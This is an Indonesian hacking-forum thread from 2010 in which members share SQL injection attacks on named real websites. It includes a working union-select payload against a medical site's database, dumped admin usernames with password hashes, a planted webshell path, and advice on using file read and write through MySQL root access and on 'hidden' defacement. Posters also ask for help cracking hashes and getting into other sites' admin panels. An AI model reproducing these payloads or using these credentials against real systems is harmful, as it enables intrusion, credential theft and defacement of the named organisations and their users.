bug sql lagi neh...

Post by **peniru** » Fri Jun 04, 2010 4:54 pm

3xtr3m3b0y wrote:
danang cool wrote:iya bos..aku sampe puyeng nih...
ni ada lagi...

http://gigi.klikdokter.com/article.php?id=3

iluni:1f14598500e044cb
klikdokteradm:1eabc305578153ef
admin:0d2f851159999c86

tadi tak decrypt md5 muncul lagi enkripsi baru...duh bisa minta bantuan para master.... :circle:
Mgkn itu bukan tabel yg tepat Om, coba cek tabel yg lain
Kayakx user database yg aktif setingkat ROOT, soalnya bisa buka database mysql:
Code: Select all
http://gigi.klikdokter.com/article.php?id=-3+union+select+1,2,user(),database(),5,6,7+from+mysql.user--
Monggo dikembangkan lebih lanjut, tutornya sdh ada dibahas sebelumnya.
Hasilnya sementara sprt ini:
Code: Select all
http://www.klikdokter.com/userfiles/.3xtr3m3b0y.php
NB: For educational only...!!!

kk tu tabel mysql.user apa ditebak?? trus kemaren ane dapet web yang membatasi login admin make IP address...
nah waktu liat file configna, ane taw kalo dia pake tabel visits, tabel ip2nation n tabel ip_tabel wat filteringnya...
tp pas ane jalanin query ke dbnya eh katanya tabel visits dak ada kk... tu maksudna kek gimana
mohon pencerahanna...

Post by **j0ck3r** » Fri Jun 04, 2010 6:35 pm

3xtr3m3b0y wrote:
nenenporeper wrote:lagi....http://www.yamaha-vega.or.id/article.ph ... 0701090001
user:xxxxxx
pasw:xxxxxx
user:xxxxxx
passw:xxxxxx

web yang gw urus neey
Segera di patch Om, Pass di enkripsi serta diganti...

NB: Buat teman2 please jgn share Password di forum terutama Password yg tdk terenkripsi, jika mo deface sebaiknya gunakan HIdden Deface, jgn melakukan daface pada halaman utama...

maap om...gak sengaja...besuk2 gak di share lagi kalau gak di enkrip... :maaf: :maaf: :maaf: :maaf:

my name danang col:j0ck3r

Post by **3xtr3m3b0y** » Fri Jun 04, 2010 7:09 pm

peniru wrote:
3xtr3m3b0y wrote: Mgkn itu bukan tabel yg tepat Om, coba cek tabel yg lain
Kayakx user database yg aktif setingkat ROOT, soalnya bisa buka database mysql:
Code: Select all
http://gigi.klikdokter.com/article.php?id=-3+union+select+1,2,user(),database(),5,6,7+from+mysql.user--
[/color][/b]
kk tu tabel mysql.user apa ditebak?? trus kemaren ane dapet web yang membatasi login admin make IP address...
nah waktu liat file configna, ane taw kalo dia pake tabel visits, tabel ip2nation n tabel ip_tabel wat filteringnya...
tp pas ane jalanin query ke dbnya eh katanya tabel visits dak ada kk... tu maksudna kek gimana
mohon pencerahanna...

mysql.user => formatnya: database.table
Pada database server MySQL, akan selalu ada sebuah database yg bernama mysql, hanya sj tdk semua user yg didaftar di MySQL Server diberikan hak utk mengakses database mysql. Biasanya user setingkat root yg diberikan akses itu. Jika user database yg aktif saat ini memiliki tingkatan akses setingkat root, maka hal ini memungkinkan kita utk mengeksekusi bbrp fasilitas MySQL Server seperti load_file (membaca file2 yg ada pada sistem) dan into+outfile (membuat file pada sistem).

Post by **peniru** » Fri Jun 04, 2010 7:55 pm

oh jadi seperti itu yah... kk... aku baru paham.... hehehe tq wat pencerahanna kk...

maafkan kalo pertanyaana oot banget cus masi noob :circle:

nenenporeper · Post by **nenenporeper** » Sat Jun 05, 2010 9:48 am

j0ck3r wrote:
3xtr3m3b0y wrote:
nenenporeper wrote:lagi....http://www.yamaha-vega.or.id/article.ph ... 0701090001
user:xxxxxx
pasw:xxxxxx
user:xxxxxx
passw:xxxxxx

web yang gw urus neey
Segera di patch Om, Pass di enkripsi serta diganti...

NB: Buat teman2 please jgn share Password di forum terutama Password yg tdk terenkripsi, jika mo deface sebaiknya gunakan HIdden Deface, jgn melakukan daface pada halaman utama...
maap om...gak sengaja...besuk2 gak di share lagi kalau gak di enkrip... :maaf: :maaf: :maaf: :maaf:

my name danang col:j0ck3r

hehehehe gw mau ucapin terima kasih atau marah ...yang jelas sedih hehehehehe kasihan membernya ..btw ntar gw mo minta tolong di oprek juga yaaa..web sendiri kok bukan punya orang lain.

Post by **j0ck3r** » Sat Jun 05, 2010 4:07 pm

maap om nenenporeper...kan gak ane rusak...cuma dikasih tahu lewat tulisan...daripada dihajar malingsia lho.. :devil :devil :devil

tama.cla10 · Post by **tama.cla10** » Sat Jun 05, 2010 11:21 pm

dear kk' master,
mohon pencerahannya :
http://www.beautycall.co.uk/administrator/
2011:beautycall2010:d68553e40237bde1465a1da5b199c072:[email protected]
uid : beautycall2010
pwd: xxxxxxxxxxxx

udah coba di encrpyt masih blm tembus...
mohon pencerahannya dan trims ...

regards,

...::: tama.cLa10 yang selalu bodoh :::...

demonbrando · Post by **demonbrando** » Sun Jun 06, 2010 12:23 am

mantap dah kk...ijin ikut eksekusi... :circle: :devil :tapa:

tama.cla10 · Post by **tama.cla10** » Sun Jun 06, 2010 3:34 pm

wat kk' demonbrando : silahkan kk' ... mhon di share y kk' update'a ... biar indonesia tetap jaya !!!
:malumalu:

tama.cla10 · Post by **tama.cla10** » Sun Jun 06, 2010 5:02 pm

danang cool wrote:http://www.beraucoal.co.id/

login:http://www.beraucoal.co.id/login.php

user:dini
pass:xxxxxx
user:administrator
password:xxxxxx :love: :love: :love: :love:
:ngakak: :ngakak: :ngakak: :ngakak: :ngakak:

http://www.perpus-klaten.net/
login:http://www.perpus-klaten.net/login.php
user:admin
pass:xxxxxx
level:super

dear kk' master,

http://www.perpus-klaten.net/login.php
uid : admin
pwd: xxxxx
kategori : super

info ::> 5.0.51a-3ubuntu5.5
error when want to log in : Akses ditolak!

mhon pencerahannya...

regards,

...::: tama.cLa10 selalu bodoh :::...

*Cyber Security Forum (X-code) - PT. Teknologi Server Indonesia

bug sql lagi neh...

Re: bug sql lagi neh...

Re: bug sql lagi neh...

Re: bug sql lagi neh...

Re: bug sql lagi neh...

Re: bug sql lagi neh...

Re: bug sql lagi neh...

Re: bug sql lagi neh...

Re: bug sql lagi neh...

Re: bug sql lagi neh...

Re: bug sql lagi neh...